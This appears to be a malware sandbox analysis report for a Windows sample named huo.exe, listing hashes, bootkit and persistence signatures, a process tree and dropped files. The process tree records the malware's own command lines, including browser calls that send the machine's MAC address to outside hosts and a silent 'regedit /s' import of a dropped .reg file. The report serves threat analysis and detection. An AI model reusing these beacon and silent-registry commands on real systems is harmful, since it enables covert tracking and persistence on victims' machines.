Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

huo.exe

windows7-x64

7

huo.exe

windows10-2004-x64

7

tj.html

windows7-x64

1

tj.html

windows10-2004-x64

1

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2024, 08:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    huo.exe

  • Size

    85KB

  • MD5

    abc1a6cedb451694d573a61be7cb0d33

  • SHA1

    a1a1741dcb4a5589ba07bab5931073aeee5275f5

  • SHA256

    a35a56366604e755cca7583f94fc0a851b736beb569615d07fb2ff0c81e48986

  • SHA512

    41d3d98baeaf4931388b9231a79fbc5f284755a9c75d5d91ad2716b3e78e501dc9668d7fe0e9cfc6fcac5d45f869b2f9e75779e748e8719d21aeaadb95bc3133

  • SSDEEP

    1536:xF4mvWAvxyR5UNATpYRGST7/aN0o88FwbWcK4bqTpAj09m:omTxyRPpY4ST7/aNf8PbWcK4buW04

Score
7/10
bootkitpersistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 14 IoCs
  • Modifies Internet Explorer settings 1 TTPs 48 IoCs
    adwarespyware
  • Modifies registry class 14 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\huo.exe
    "C:\Users\Admin\AppData\Local\Temp\huo.exe"
    1⤵
    • Loads dropped DLL
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.the9q.com/tong/get.asp?mac=66DD11CD6629&makedate=QM00013&comput=Home&ver=27&userid=0008
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2548 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1316
    • C:\Windows\SysWOW64\hrdsoft.exe
      C:\Windows\system32\hrdsoft.exe C:\Users\Admin\AppData\Local\Temp\huo.exe===
      2⤵
      • Executes dropped EXE
      • Writes to the Master Boot Record (MBR)
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
          4⤵
          • Modifies registry class
          • Runs .reg file with regedit
          PID:2788
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.38078.comget.asp?mac=66DD11CD6629&makedate=QM00013&comput=Home&ver=30&userid=0
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2748 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1048

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    67KB

    MD5

    753df6889fd7410a2e9fe333da83a429

    SHA1

    3c425f16e8267186061dd48ac1c77c122962456e

    SHA256

    b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

    SHA512

    9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    304B

    MD5

    acad335258ad98940d9d4274eb2c6679

    SHA1

    b99ca9e4519fa077363d80eeeea36442730c0b55

    SHA256

    1c08cb7574e31216e3846448896406596cbef077917f041737cedc03c46a199e

    SHA512

    af0bce4a3347f1a3e3a6dad59a5bfb7d5e9d52cd3feb90a214fd54b29613eaf1ca6e5758b04932764c2123bd8a7b8d093b410235e637992fc7be2efe4760b3bf

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    304B

    MD5

    8cb7dbba97e6c89b367a3b3a5b0e0a6e

    SHA1

    372fc14d9c5d6861d9268df93850a6642332a017

    SHA256

    9e0b545099bb13d14ccde11a900dc1991f1b986e2e4ccc85757004b5c1032c80

    SHA512

    81b045e23baaf8f878588e4245b596f3bad38d3c9b437c5eeb8aadd865fdecdcb6e72b46995e19eb08a6ef3a021e5dd4e823d4316dc8e566832139de9cd8932c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    304B

    MD5

    4245e6531bde297afbe67a25d1eedc7e

    SHA1

    b64ef6716b191d57c6f089050af7a6798d8a41a7

    SHA256

    6c74c227a8588c7befad172238bf9c225f32213df89cb2e359e1b5a7d7779453

    SHA512

    8e69f347b6ee73f4fdcff9413ab77bb560cf7af7f566fd541cd261c749c92708390db9360b958f2e5bc0fe91da96575f94ba43f6725c6e8ff696b15bd5f14df1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EB9B7D71-D614-11EE-B6BE-66DD11CD6629}.dat
    Filesize

    5KB

    MD5

    d20d5e11f6b415f0529249b9bc1516cd

    SHA1

    84656c2ff5852c59494d2150f93ec433b0241075

    SHA256

    36a8a69be601217c728b07464451764d7ac7240e3960ddec08defdd730fd7c3a

    SHA512

    1ac5787b72b86cc9594d55aa13cf1ba91c8900ad1dc7cfebf91a8d3f1eb880a6b602fd7451450e777dc5db731727f89932834ccd4978c37bb9086ee9d08a24e2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab8421.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar8782.tmp
    Filesize

    175KB

    MD5

    dd73cead4b93366cf3465c8cd32e2796

    SHA1

    74546226dfe9ceb8184651e920d1dbfb432b314e

    SHA256

    a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

    SHA512

    ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\getback.reg
    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

    Download Submit

  • \Windows\SysWOW64\hrdsoft.exe
    Filesize

    16KB

    MD5

    1132d58cf550d49b6d2dbb59c07fedb5

    SHA1

    4068621fdfa719ae3b8070240f5dfd490f09505d

    SHA256

    17a99a46f69ddcf677a0241007c1c35e53e24216a0c515662de2f0522f41f105

    SHA512

    1d7691c28aa0f3ae8b5f3bf47245b936c810c79baf5407e0af2e9b70cb095549baeeb35265735f7db7906ec96e4843a69e9e79a81270d990841d7be8258de91c

    Download Submit

  • memory/1924-31-0x00000000003D0000-0x00000000003DC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1924-44-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

    Download

  • memory/1924-0-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

    Download

  • memory/1924-24-0x00000000003D0000-0x00000000003DC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1924-1-0x0000000000020000-0x0000000000022000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2908-33-0x0000000000020000-0x0000000000021000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2908-32-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2908-180-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

    Download